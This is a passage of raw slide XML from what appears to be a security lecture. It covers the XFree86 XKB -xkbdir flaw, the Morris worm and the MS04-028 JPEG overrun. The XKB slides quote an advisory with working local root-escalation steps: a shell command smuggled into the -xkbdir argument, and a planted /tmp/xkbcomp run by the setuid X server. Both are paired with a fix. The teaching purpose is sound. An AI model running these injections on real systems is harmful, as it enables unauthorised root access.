          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   #!/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
              <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>a+x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>xkbcomp</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
              <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XF86_(place </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>your</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> favorite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>xserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>here</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> :p) -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>xkbdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" sz="1400" b="1" dirty="0">
              <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" sz="1400" b="1" dirty="0">
              <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>xserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>will</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>now</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>xkbcomp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>... wh000t!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
              <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Phuzzy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> L0gik (phuzzy_l0gik@hotmail.com)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>     -=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" sz="1400" dirty="0">
              <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
            </a:endParaRP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47</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>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250825" y="1036638"/>
            <a:ext cx="7561263"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sz="1400" b="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Quick vulnerability check:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$ Xserver -xkbdir ':;id &gt; /tmp/I_WAS_HERE;'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>[exit X server]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$ grep root /tmp/I_WAS_HERE &amp;&amp; echo 'Gotcha!'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" sz="1400" b="1">
              <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" b="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Quick fix:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1. as usual chmod u-s,g-s all installed Xserver binaries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2. use xdm or a SAFE and PARANOID wrapper to start Xserver</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" sz="1400" b="1">
              <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400" b="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Details:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>In fact, there are (at least) two distict problems in XKB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1400">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>implementation,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1400">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>both related to the use of -xkbdir option.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1. xkbcomp is invoked using system() or popen()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1400">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> any shell metacharacters included in -xkbdir argument are interpreted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1400">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>[demonstrated by the "quick vulnerability check"]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2. a user supplied instance of xkbcomp is invoked</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1400">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> -xkbdir argument is used to build the path to the compiler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" sz="1400">
              <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$ cat &gt; /tmp/xkbcomp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>#!/bin/sh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>id &gt; /tmp/I_WAS_HERE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>[ctrl+d]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$ chmod a+x /tmp/xkbcomp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>$ Xserver -xkbdir /tmp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1400">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>[X server executes /tmp/xkbcomp]</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48</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>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p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>Xserver - today</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107523" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>X server often started using xdm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>Normal users do not run X</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>X does not need SUID root privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>X server xkbdir parameter</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1075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827463"/>
            <a:ext cx="7777163" cy="1041400"/>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49</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" alt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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>Morris worm</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79875" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>The Morris worm changed the Internet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>Robert T. Morris was convicted of violating the computer Fraud and Abuse Act (Title 18), and sentenced to three years of probation, 400 hours of community service and a fine of $10,050.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>Computer Emergency Response </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>Team (CERT) was formed (at the</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" dirty="0"/>
              <a:t>Carnegie Mellon University)</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="79876" name="Picture 4" descr="morris2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4005263"/>
            <a:ext cx="2552700" cy="2552700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79878" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1830388" y="6165850"/>
            <a:ext cx="4470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dirty="0"/>
              <a:t>Robert T. Morris in 2004. Source: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1200" dirty="0"/>
              <a:t>http://pdos.csail.mit.edu/~rtm/</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a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ"/>
              <a:t>MS04-028</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>: JPEG processing</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75779" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2000"/>
              <a:t>Buffer Overrun in JPEG Processing (GDI+) Could Allow Code Execution (833987)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1800" b="1"/>
              <a:t>Impact of Vulnerability:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1800"/>
              <a:t> Remote Code Execution</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" sz="1800" b="1"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1800" b="1"/>
              <a:t>Maximum Severity Rating: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1800"/>
              <a:t>Critical</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ" sz="1800" b="1"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1800" b="1"/>
              <a:t>Recommendation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" altLang="cs-CZ" sz="1800"/>
              <a:t>Customers should apply the update immediately.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="cs-CZ" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2000"/>
              <a:t>JPEG Vulnerability - CAN-2004-0200:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="1800"/>
              <a:t>“A buffer overrun vulnerability exists in the processing of JPEG image formats that could allow remote code execution on an affected system. Any program that processes JPEG images on the affected systems could be vulnerable to this attack, and any system that uses the affected programs or components could be vulnerable to this attack. An attacker who successfully exploited this vulnerability could take complete control of an affected system.”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ" sz="2000" b="1"/>
              <a:t>Integer underflow</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50</a:t>
            </a:fld>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>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p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="cs-CZ"/>
              <a:t>MS04-028: Affected components</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" altLang="cs-CZ"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1095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844675"/>
